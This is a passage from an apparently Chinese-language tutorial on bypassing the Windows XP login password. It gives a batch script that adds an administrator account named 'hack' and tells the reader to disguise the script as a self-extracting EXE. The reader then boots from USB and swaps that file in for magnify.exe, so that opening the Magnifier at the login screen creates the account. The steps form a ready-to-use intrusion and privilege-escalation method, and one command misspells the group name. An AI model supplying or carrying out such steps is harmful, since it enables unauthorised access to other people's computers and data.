@net user hack 123456 /add

　　@net localgroup administraroes hack /add

　　@exit

　　然后保存为XX.bat就可以了!

　　又有人要问我了，我们要的是XX.EXE你却给我们弄个XX.bat你什么意思嘛?

　　问得好!我们让它运行XX.EXE就等同运行了XX.bat不就可以了嘛!

　　要达到这样的目的，就要用到winrar，用winrar制作一个自解压文件，不就把XX.bat变成XX.EXE了吗?运行XX.EXE就等同运行了XX.bat.(把XX.EXE拷到 U 盘上去)

　　③.替换文件.到COMS里去把第一启动换到USB-HDD，保存----插入U盘，进入系统的c:\windows\system32下去. copy magnify.exe 007magnify.exe (对magnify.exe进行备份，magnify.exe为放大镜执行程序).在把U盘上的XX.EXE拷到system32下，并该为magnify.exe就可以了!

　　然后从硬盘启动就可以了!再到XP登陆密码时，你只要运行放大镜就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用户就可以进去了!进去把管理员密码改过来吧!

　　这样就成功的绕过了XP的登陆密码，只要了一个U盘，好方便。